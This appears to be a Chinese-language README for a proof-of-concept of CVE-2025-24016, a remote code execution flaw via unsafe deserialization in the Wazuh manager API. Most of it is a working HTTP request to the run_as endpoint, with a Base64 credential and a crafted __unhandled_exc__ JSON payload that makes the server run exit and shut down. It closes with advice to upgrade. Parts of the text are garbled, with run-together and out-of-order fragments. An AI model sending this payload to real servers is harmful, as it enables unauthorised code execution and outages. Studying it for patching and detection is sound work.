
CVE-2025-24016:Wazuh 服务器中的 RCE!远程代码执行
本仓库演示了 Wazuh 服务器中因 wazuh-manager 包中不安全的反序列化引入的远程代码执行 (RCE) 漏洞。该漏洞允许具有 API 访问权限的远程攻击者(受损的仪表盘、集群中的 Wazuh 服务器、或某些配置下被攻破的代理)在服务器上执行任意代码。
wazuh-manager 版本 >= 4.4.0>= 4.9.1 中修复该漏洞出现在 Wazuh API 中,其中 DistributedAPI 中的参数被序列化为 JSON,并在 framework/wazuh/core/cluster/common.py 文件中使用 as_wazuh_object 进行反序列化。攻击者可以通过向 DAPI 请求中注入未清理的字典来利用此漏洞,这可能导致执行任意 Python 代码。
可以使用 run_as 端点触发 RCE,该端点允许攻击者控制 参数。通过构造恶意请求,可以在主服务器上执行任意代码。
auth_context要使用服务器 API 触发此漏洞,请执行以下步骤。
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64 编码的 "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-)。__unhandled_exc__,它会触发任意 Python 代码(本例中为 exit)的执行。>= 4.4.0 至 4.9.0(尚未修复)。exit 函数,导致 Wazuh 服务器关闭。为保护您的系统,请升级至 Wazuh 版本 >= 4.9.1,该版本已修复此问题。